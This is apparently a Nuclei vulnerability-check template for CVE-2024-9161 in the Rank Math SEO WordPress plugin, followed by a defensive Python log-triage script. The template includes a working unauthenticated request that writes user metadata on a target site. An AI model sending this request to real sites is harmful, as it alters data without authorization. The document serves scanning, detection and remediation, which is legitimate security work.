Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
PoC code [public]
id: CVE-2024-9161

info:
  name: Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion
  author: Kazgangap
  severity: medium
  description: |
    Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
  impact: |
    Unauthenticated attackers can modify or delete metadata, leading to data loss and potential denial of access to the admin dashboard.
  remediation: |
    Update to version 1.0.229 or later.
  reference:
    - https://wpscan.com/vulnerability/95be2559-f0e2-4e98-9bef-3989df0d25bf/
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L120
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L161
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L162
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L64
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-9161
    cwe-id: CWE-862
    epss-score: 0.09766
    epss-percentile: 0.92673
    cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rankmath
    product: seo
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/seo-by-rank-math/"
    fofa-query: body="/wp-content/plugins/seo-by-rank-math/"
    publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
  tags: cve,cve2024,wordpress,seo-by-rank-math,wp-plugin,wpscan,rankmath,intrusive,vkev

variables:
  objectid: "{{rand_int(1,9)}}"
  data: "meta_{{to_lower(rand_text_alpha(12))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Rank Math")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "objectType": "user",
          "objectID": {{objectid}},
          "meta": {
            "{{data}}": "{{data}}"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"slug", "true", "schemas")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502205a99a000ddd28d8fa56f27735717684f77bc5c85ffe665f156e6d390aca191d2022100c480c343798645b623dea381e606be593ac7567b78bc39114992f3d73cac9183:922c64590222798bb761d5b6d8e72950
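
For defenders, a log triage helper for the route this template targets. This is an added example, not part of the template or the plugin. It assumes Combined Log Format access logs and uses the heuristic that legitimate editor traffic carries a wp-admin Referer; the sample lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

ROUTE = "/rankmath/v1/updatemeta"  # route from the template, lower-cased

# Assumed input: Combined Log Format
# ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) '
    r'[^"]*" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

def hits_route(target):
    """Match the pretty-permalink and the ?rest_route= form of the route."""
    parts = urlsplit(target)
    path = unquote(parts.path).rstrip("/").lower()
    if path.endswith("/wp-json" + ROUTE):
        return True
    # parse_qs percent-decodes the query value
    routes = parse_qs(parts.query).get("rest_route", [])
    return any(r.rstrip("/").lower() == ROUTE for r in routes)

def suspicious_posts(lines):
    """Count, per client IP, successful POSTs to the route that did not
    come from a wp-admin page (heuristic: the editor UI sets that Referer)."""
    found = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["status"] != "200":
            continue
        if not hits_route(m["target"]):
            continue
        if "/wp-admin/" in urlsplit(m["referer"]).path:
            continue  # likely a logged-in editor session, review separately
        found[m["ip"]] += 1
    return found

# Constructed sample lines (documentation IP ranges, not real traffic)
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "POST /wp-json/rankmath/v1/updateMeta HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Oct/2024:13:55:40 +0000] "POST /?rest_route=%2Frankmath%2Fv1%2FupdateMeta HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Oct/2024:14:01:02 +0000] "POST /wp-json/rankmath/v1/updateMeta HTTP/1.1" 200 498 "https://example.test/wp-admin/post.php?post=12&action=edit" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2024:14:05:11 +0000] "POST /wp-json/rankmath/v1/updateMeta HTTP/1.1" 401 120 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, n in suspicious_posts(SAMPLE).most_common():
        print(f"{ip}\t{n} updateMeta POST(s) without a wp-admin Referer")
```

A hit on a site that was running a version up to 1.0.228 at the time is a reason to review user and term metadata for unexpected keys.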